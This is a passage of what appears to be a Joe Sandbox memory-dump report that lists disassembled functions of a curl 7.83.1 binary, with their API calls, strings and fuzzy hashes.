free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E38
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E4F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E66

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 32e146b434e63e71db08f0dc662a587833e209b9d855eeff6a6124f56296a8e6
Instruction ID: f0d628fe87f964be97eef94f7250c74308797629f4a3553467639c4603f1f620
Opcode Fuzzy Hash: 32e146b434e63e71db08f0dc662a587833e209b9d855eeff6a6124f56296a8e6
Instruction Fuzzy Hash: EC418671A24926EFCB085F24ED48458BBB6FF48361310912FE41293E61CBB4BCA18FD5

Function 001028A4 Relevance: 16.7, APIs: 5, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00102A8C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00102A9E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00102ABA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00102ACE
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00102AE7

Strings

UIDVALIDITY, xrefs: 00102987
/, xrefs: 001028E8
UID, xrefs: 001029BA
PARTIAL, xrefs: 00102A4D
MAILINDEX, xrefs: 001029ED
SECTION, xrefs: 00102A1D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: /$MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
API String ID: 1294909896-4153388952
Opcode ID: de25a833d085af2156ae6e9aabc259f217b23c02858d0656935a2df090f8c31f
Instruction ID: 4a2869a03f4dff43d0e0cd050b691a5de9bdb1c7b67da9e4e38afec5c341aeb9
Opcode Fuzzy Hash: de25a833d085af2156ae6e9aabc259f217b23c02858d0656935a2df090f8c31f
Instruction Fuzzy Hash: 6C81CC30A04346DFDF34DF64C858AADBBB5EF94314F24806ED882A3A92DBB09D41CB51

Function 000CE407 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 403COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed,?,?,?,?,00000000), ref: 000CE483

Strings

%-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s, xrefs: 000CE949
%3I64d, xrefs: 000CE686, 000CE6DF
DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed, xrefs: 000CE47E
--:--:--, xrefs: 000CE8A1

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fputs
String ID: %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s$%3I64d$--:--:--$DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed
API String ID: 1795875747-33453460
Opcode ID: 589f91fdc850d7ecf56fe6afbdf0bd1e5a6f8af44a31d303c929de2e51d23f60
Instruction ID: 9ffc2089140948ab4b24f2272b82de94d463b5dc640362ae57d6499c98d17874
Opcode Fuzzy Hash: 589f91fdc850d7ecf56fe6afbdf0bd1e5a6f8af44a31d303c929de2e51d23f60
Instruction Fuzzy Hash: 60024675D00298AFDB25CFA8D884BEDBBB5FF48304F2441AEE408AB252D7715996CF50

Function 000C8599 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 196COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C85D1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C861E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C864D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 000C867C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C86F7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C8795

Strings

option %s: %s, xrefs: 000C876D
%s, xrefs: 000C8780
--url, xrefs: 000C86E3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup$malloc
String ID: %s$--url$option %s: %s
API String ID: 854390910-3421415073
Opcode ID: df79a856d94fbcaab7858a95a0b29b76e272d1fb53366ee8db68bbf3d4719146
Instruction ID: 3f74a2171c919ea97d06206170b2d7900ec8478533ac6a68a50210cc887daf56
Opcode Fuzzy Hash: df79a856d94fbcaab7858a95a0b29b76e272d1fb53366ee8db68bbf3d4719146
Instruction Fuzzy Hash: 5561E435A08105AFCB69DBA8D488FEEBBF1AB44310F24C1AEE545A7251EF70DD81C758

Function 000C7E68 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 91fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C7E8E
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000C7EA0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7EB2
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C7ECF
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C7EDB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7F11
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7F21

Strings

Failed to read %s, xrefs: 000C7EFC
<stdin>, xrefs: 000C7E86

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_funcfree$_strdupfclosefopen
String ID: <stdin>$Failed to read %s
API String ID: 229151352-3349806160
Opcode ID: e00c092484663607d23e100193e10439646c02dd8ffb35b93725cb84ce2029a8
Instruction ID: c9a321e4317c8c088254b1955740f932d3db9885ed17f8bba7ba7a7107ba4e92
Opcode Fuzzy Hash: e00c092484663607d23e100193e10439646c02dd8ffb35b93725cb84ce2029a8
Instruction Fuzzy Hash: F031917160C741DFC7599F349884BEEBBE5AB9A351F14496EF49AC3140EB3198818B42

Function 000CDA2F Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 88COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(curl/7.83.1), ref: 000CDAFA

Strings

host, xrefs: 000CDABA
out of memory, xrefs: 000CDB07
Accept, xrefs: 000CDA7C
Content-Type, xrefs: 000CDA5A
Accept: application/json, xrefs: 000CDA8A
proxy, xrefs: 000CDADD
Content-Type: application/json, xrefs: 000CDA6A
curl/7.83.1, xrefs: 000CDAF5

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdup
String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
API String ID: 1169197092-2108368468
Opcode ID: 808bfde5e1bb3ce541774db8139f061df94615243cc9fde4d7de1a139e90ff30
Instruction ID: f6b8189483d34f2e55541fef96a0715c6c4cf4e5657a6ff59f35950707b1797e
Opcode Fuzzy Hash: 808bfde5e1bb3ce541774db8139f061df94615243cc9fde4d7de1a139e90ff30
Instruction Fuzzy Hash: E5219F353087059FEF25AB25A461FAFB7E6DB84364F20443FE44AA7287EB709C45CA11

Function 000C89A1 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 40COMMON

Download Yara Rule

APIs

puts.API-MS-WIN-CRT-STDIO-L1-1-0(Usage: curl [options...] <url>), ref: 000C89A9
puts.API-MS-WIN-CRT-STDIO-L1-1-0(This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".), ref: 000C89C3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000C8A13

Strings

category, xrefs: 000C89E6
all, xrefs: 000C89CC
Usage: curl [options...] <url>, xrefs: 000C89A2
Invalid category provided, here is a list of all categories:, xrefs: 000C8A01
This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all"., xrefs: 000C89BE

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: puts$free
String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
API String ID: 1067472072-287794235
Opcode ID: 45a4dcad6dc834da2e3f52f0b3c40cb79248ddd925d79fd9dccdec8fa2d29ee8
Instruction ID: 1c38e0145c1dc8dd6bf5546aec5db089554407ceaf1dbd226bd329613fd266c6
Opcode Fuzzy Hash: 45a4dcad6dc834da2e3f52f0b3c40cb79248ddd925d79fd9dccdec8fa2d29ee8
Instruction Fuzzy Hash: 51F09021209A10D79B2D77202D1EFED2951AF817B0B98C02EF422769C7EF64CC8143AB

Function 000D5F16 Relevance: 15.5, APIs: 4, Strings: 6, Instructions: 480COMMON

Download Yara Rule

Strings

file://%s%s%s, xrefs: 000D6134
file, xrefs: 000D610A
%%25%s], xrefs: 000D6242
%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 000D6403
%25, xrefs: 000D62FF
https, xrefs: 000D6167

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: %%25%s]$%25$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
API String ID: 0-326007067
Opcode ID: 3833ff69c8f925f3341f317cfd872358a99c4ec9e3296d3195f150291a06660f
Instruction ID: df8b58cc83f6f43f3e692f88920ccf4b616ad1cb9c10833ff0aa5c05dcbff6d8
Opcode Fuzzy Hash: 3833ff69c8f925f3341f317cfd872358a99c4ec9e3296d3195f150291a06660f
Instruction Fuzzy Hash: F702BF31E00716EBDF658FA8D8507AEBBF1AF49710F18806AE901AB341D7729D51CBB0

Function 0010A0B9 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 299COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A1B4

Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A4FB
Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A52C
Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A54E
Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A565

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A211
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A267
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A426

Strings

SSPI: couldn't get auth info, xrefs: 0010A16E
Negotiate, xrefs: 0010A155, 0010A232
SPNEGO handshake failure (empty challenge message), xrefs: 0010A2D3
HTTP, xrefs: 0010A0D1
CompleteAuthToken failed: %s, xrefs: 0010A488
InitializeSecurityContext failed: %s, xrefs: 0010A440

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$calloc$malloc
String ID: CompleteAuthToken failed: %s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)$SSPI: couldn't get auth info
API String ID: 3103867982-170984166
Opcode ID: 0cc3f4ef27cc188ba052b87a188083dea457ae6cb693523e4d9abac9d7640195
Instruction ID: 756c27f029b31fa7afe4b507b1b8da28c2558e578b52c5dd76bc117fe387265e
Opcode Fuzzy Hash: 0cc3f4ef27cc188ba052b87a188083dea457ae6cb693523e4d9abac9d7640195
Instruction Fuzzy Hash: 74C13D75A00629AFDB24CF14DD54BD9B7B5FF48310F4081AAE849E7690DBB0AE94CF81

Function 000DBF00 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 255COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC0A8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC0C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC19D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC1B7

Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,74F83C50,00000000,000E182F), ref: 000DF671
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF685
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF699
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6AD
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6C1
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6D5
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6E9
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6FD
Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF70F

Part of subcall function 000E0830: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E086B

Strings

Set-Cookie:, xrefs: 000DC14B
RELOAD, xrefs: 000DC01D
SESS, xrefs: 000DBF72
ALL, xrefs: 000DBF0D
ignoring failed cookie_init for %s, xrefs: 000DC06A
FLUSH, xrefs: 000DBFFF

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$calloc
String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
API String ID: 3095843317-3179978524
Opcode ID: 55259b9a28bdf0aa9e8b6049fbaf16683a9b1367c85a162978ae5df1fe5a15a5
Instruction ID: c354ab74751c5acdbb4db27d320934a3ada6ee8fc5652e7f34bc874e7f852d47
Opcode Fuzzy Hash: 55259b9a28bdf0aa9e8b6049fbaf16683a9b1367c85a162978ae5df1fe5a15a5
Instruction Fuzzy Hash: B881B571704712CBDB689F289851A6E77D2AF85710F24843FE84ADB392DF74DC428AB1

Function 000E443D Relevance: 15.2, APIs: 10, Instructions: 236COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000E4488
___from_strstr_to_strchr.LIBCMT ref: 000E44AE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000DA931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 000E4544
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000DA931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 000E456A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000DA931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 000E4590
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 000E45AC
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000), ref: 000E45C1

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: malloc$___from_strstr_to_strchrfree
String ID:
API String ID: 402731313-0
Opcode ID: 9effbe2fde94fc8d06b215e5496ce4bd7278af0088511faeadba7cd63dc6ea1e
Instruction ID: d1cf56be6e1119afb083d8b1c8bd8f596dcb3c22d0982cfe4a4e124d516ae406
Opcode Fuzzy Hash: 9effbe2fde94fc8d06b215e5496ce4bd7278af0088511faeadba7cd63dc6ea1e
Instruction Fuzzy Hash: 67816C72E0065ADFCF28CFA9D8845AEBBF5EF88350B14816AE815F7251DB309D41CB90

Function 000C38AE Relevance: 15.2, APIs: 10, Instructions: 172COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C38EC
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C38F4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3902

Part of subcall function 000C1018: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,000C3910), ref: 000C101E
Part of subcall function 000C1018: _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,000C3910), ref: 000C1025

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3911
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3919
_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 000C393E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C398D
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000C39B7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C39FD
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C3A3D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdup$_fstat64_setmodefreeftell
String ID:
API String ID: 4154865980-0
Opcode ID: f662e11e2b585810eccdd064749a96843097442b4a0e968c792f1c7e8f45506a
Instruction ID: 33614df1026b259ce96e16e1f4f0dd26cbd364c71d685169b2761fc901409ae0
Opcode Fuzzy Hash: f662e11e2b585810eccdd064749a96843097442b4a0e968c792f1c7e8f45506a
Instruction Fuzzy Hash: AF519172D20719CFCB24DFA4C985B9DBBF5FF49720F20811EE445A7241EBB0AA418B40

Function 000D49D3 Relevance: 15.1, APIs: 12, Instructions: 78COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000D5D8C,74F83C50,000E16C0), ref: 000D49E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D49FB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A0F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A23
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A37
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A4B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A5F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A73
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A87
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A9B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4AAF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4AC3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1fce5bc8069036c6c3cf19b1c6b3f28ac739190a3a25462d8b1f8d5351231459
Instruction ID: 09868995e38536c27eb11be9091fcbfa36f4d2ee7d4dbe0b939942309c4adcec
Opcode Fuzzy Hash: 1fce5bc8069036c6c3cf19b1c6b3f28ac739190a3a25462d8b1f8d5351231459
Instruction Fuzzy Hash: CC21A732614829EB8B091F14FD0845CBBB6FF88261315C02BE45193A71CFB52CA28FE6

Function 00100710 Relevance: 14.4, APIs: 3, Strings: 5, Instructions: 375COMMON

Download Yara Rule

APIs

_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 0010078E

Part of subcall function 001004E4: ___from_strstr_to_strchr.LIBCMT ref: 00100503

Strings

Accept-ranges: bytes, xrefs: 00100820
Content-Length: %I64d, xrefs: 00100851
Can't get the size of file., xrefs: 001009AF
Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 00100935
failed to resume file:// transfer, xrefs: 00100A3D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr_fstat64
String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer
API String ID: 1237401293-1509146019
Opcode ID: 0e4a5c3950bbc5fabc760b3f576b9e87a2f7974b52a6ed811a1aeea5094af620
Instruction ID: 483140d8cbb82f764d35dbe3cb8e8123bce973a8eacd3bbcd12516ecfe354554
Opcode Fuzzy Hash: 0e4a5c3950bbc5fabc760b3f576b9e87a2f7974b52a6ed811a1aeea5094af620
Instruction Fuzzy Hash: C4D1A5756083419FEB25DF28C841BAA77D5AF98314F14453EF8C99B2C2EBB0DC448B92

Function 000E4AF4 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 169stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(%25,00000001,00000003), ref: 000E4B8D
___from_strstr_to_strchr.LIBCMT ref: 000E4C01
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 000E4C1F

Strings

Please URL encode %% as %%25, see RFC 6874., xrefs: 000E4B9A
Invalid IPv6 address format, xrefs: 000E4BEF
%25, xrefs: 000E4B88
No valid port number in connect to host string (%s), xrefs: 000E4C3E

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
